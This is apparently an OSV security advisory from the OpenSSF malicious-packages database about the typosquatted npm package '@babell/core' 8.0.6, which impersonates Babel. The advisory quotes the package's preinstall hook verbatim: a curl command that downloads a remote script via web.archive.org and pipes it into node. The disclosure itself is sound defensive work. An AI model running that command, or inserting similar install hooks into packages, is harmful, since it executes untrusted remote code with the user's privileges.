{"id":"MAL-2026-17497","summary":"Malicious code in @babell/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ae256b9ff55b98040ea9cb6561edfe1c4e2db94bd111fb19a449651bd6b5d44b)\nThe package's package.json defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading a JavaScript file from a third-party host (gitflic.ru/hellscripter, fetched through web.archive.org) and piping it directly into Node for execution at install time. The content fetched is unpinned, served from a non-publisher host unrelated to Babel, and executed with the privileges of the installing user. The package name `@babell/core` differs from the legitimate `@babel/core` by a single character, and its description, author, repository, homepage, and README all impersonate the real Babel project, serving as a delivery vehicle for the dropper.\n","modified":"2026-10-04T23:45:19.009259460Z","published":"2026-10-04T23:20:06Z","database_specific":{"malicious-packages-origins":[{"sha256":"ae256b9ff55b98040ea9cb6561edfe1c4e2db94bd111fb19a449651bd6b5d44b","source":"amazon-inspector","versions":["8.0.6"],"id":"IN-MAL-2026-020921","import_time":"2026-10-04T23:40:42.174028246Z","modified_time":"2026-10-04T23:20:06Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@babell/core/v/8.0.6"}],"affected":[{"package":{"name":"@babell/core","ecosystem":"npm","purl":"pkg:npm/%40babell/core"},"versions":["8.0.6"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"cc3271a8b9c4c1295febc8e6f4abeffddceeb483a74db202909537b3540bd5ec","tlsh":"5981cb15ec5c8c631a827968d8d90683293945c79c85bc0d33ee6a6c0f0d65f71feb1d"}],"package_integrity":[{"hashes":{"sha1":"b5d20f05ebc09181bf3037bd35ca0d0198117197","sha512_sri":"sha512-8SeBklqlX5RsBS9OqwrjUfwRzc0ZVxQmnleAJXOjLWI7NvsJmyOrQQ4EyU2Pm784tzgCNW2OQwrD9Qx2dp88Cg=="},"filename":"core-8.0.6.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@babell/core/MAL-2026-17497.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}